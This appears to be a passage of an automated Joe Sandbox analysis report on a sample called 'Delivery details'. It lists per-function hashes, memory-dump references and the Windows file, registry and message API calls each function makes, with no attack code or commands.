                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
                                                                  • Instruction ID: 4c6ae7a0626839fce45d877b24888c0af913333af22313e68c4d1644c71cb298
                                                                  • Opcode Fuzzy Hash: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
                                                                  • Instruction Fuzzy Hash: 3B319C3020021AFFDB109F95ED84ADB3F68EB04359B1085BEF904E6190D778CE509BA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                  • RegCloseKey.ADVAPI32(?,?,?,0040B5D8,00000000,00000011,00000002), ref: 00402551
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3356406503-0
                                                                  • Opcode ID: da6c4aabe5c0bcfe0cfe451c3c0d1b5c22d07e7435fa277cc4dedf5435b1c7e5
                                                                  • Instruction ID: 2d27e3624369fee7c217219a4e344138e42523264533ea489648bddc6477d6d2
                                                                  • Opcode Fuzzy Hash: da6c4aabe5c0bcfe0cfe451c3c0d1b5c22d07e7435fa277cc4dedf5435b1c7e5
                                                                  • Instruction Fuzzy Hash: 53119171900209EBEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D7B84A45DB5A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                  • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                  • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                  • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 004054F7
                                                                    • Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3
                                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 00405543
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeMessageSendUninitialize
                                                                  • String ID:
                                                                  • API String ID: 2896919175-0
                                                                  • Opcode ID: 9116b902906b86037e4df952d1fb06ecf8b3d5b9aeab51ae864e340321e9afd2
                                                                  • Instruction ID: 461e397135febbc30a5c9d3c302966ffa091eeef35a1e5a31f22b0d6bdb391fd
                                                                  • Opcode Fuzzy Hash: 9116b902906b86037e4df952d1fb06ecf8b3d5b9aeab51ae864e340321e9afd2
                                                                  • Instruction Fuzzy Hash: E1F0F072600A00EBE7215B80AD01B267365EBC4304F41407BFE88723A4C77A4C02CBAE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                    • Part of subcall function 0040671A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                    • Part of subcall function 0040671A: wsprintfW.USER32 ref: 0040676C
                                                                    • Part of subcall function 0040671A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406780
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2547128583-0
                                                                  • Opcode ID: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                  • Instruction ID: 6fedc38abd16d04710e8a636fd16f84820eabe090bba127bd882252d3fb3e83b
                                                                  • Opcode Fuzzy Hash: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                  • Instruction Fuzzy Hash: 21E0863250421156D21096745E4893772AC9AC4718307843EF956F3041DB389C35A76D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(00000003,00402F57,00438800,80000000,00000003), ref: 00405EA6
                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                  • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                  • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                  • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,?,00405A82,?,?,00000000,00405C58,?,?,?,?), ref: 00405E82
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E96
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                  • Instruction ID: b4a9c655c7fc096b4b126609cc6ca019b0e5db690544b5b17486f729e9fe50d2
                                                                  • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                  • Instruction Fuzzy Hash: F4D0C972504420ABC2502728EF0889BBB95DB542727124B35FAE9A22B0CB304C568A98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 00405966
                                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405974
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                  • Instruction ID: a0b70af09676f49ae35af12b400ff138e6ea5c47fed9fef2c083bef2843b0e9d
                                                                  • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                  • Instruction Fuzzy Hash: 97C04C71255506DADB105F31DE08F1B7A50AB60751F11843AA18AE51B0DA348455DD2D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406274
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                  • Instruction ID: 479e159ceda2cb7b50184963f42fe168e38793edbf0b306f3e9e40cefa011f94
                                                                  • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                  • Instruction Fuzzy Hash: F5E0E672010109BEEF195F50DD0AD7B371DE704314F01452EFA07E4051E6B5A9305734
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00411A8B,0040CED0,004033C2,0040CED0,00411A8B,00414ED0,00004000,?,00000000,004031EC,00000004), ref: 00405F68
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                  • Instruction ID: 6078229a914e39b74a0c5ece066be2a5834b756046c3aff4b734283800ecbe33
                                                                  • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                  • Instruction Fuzzy Hash: 2DE0EC3221065EABDF109EA59C00EEB7B6CFB053A0F004437FD25E3150D775E9219BA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040343E,0040A230,0040A230,00403342,00414ED0,00004000,?,00000000,004031EC), ref: 00405F39
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                  • Instruction ID: 9b2ea83f702eb3fffeb4c264c614e4c5cb206e28bf88f3110778221d7db1fef5
                                                                  • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                  • Instruction Fuzzy Hash: D7E08C3220021AEBCF109F508C00EEB3B6CEB04360F004472F925E2180E234E8219FA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004062AB,?,00000000,?,?,: Completed,?), ref: 00406241
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                  • Instruction ID: 3024dc78f91217c8ac754af2bee00b96045fdb9f0f4599777b3fb0e88d8c22ab
                                                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                  • Instruction Fuzzy Hash: 8AD0123200020DBBDF116E919D05FAB371DEB04310F014426FE16A4091D775D530AB15
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 178ae1473d16ca0066827b6ae8d8e359fc19d0cc8d2a11129686b24aa6896648
                                                                  • Instruction ID: 608ef69ca2b13f27eda1cfcd16162797e0d7c1effb02ba883df1ee114d760796
                                                                  • Opcode Fuzzy Hash: 178ae1473d16ca0066827b6ae8d8e359fc19d0cc8d2a11129686b24aa6896648
                                                                  • Instruction Fuzzy Hash: 44D01272B04104DBDB21DBA4AF0859D73A59B10364B204677E101F11D1DAB989559A1D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
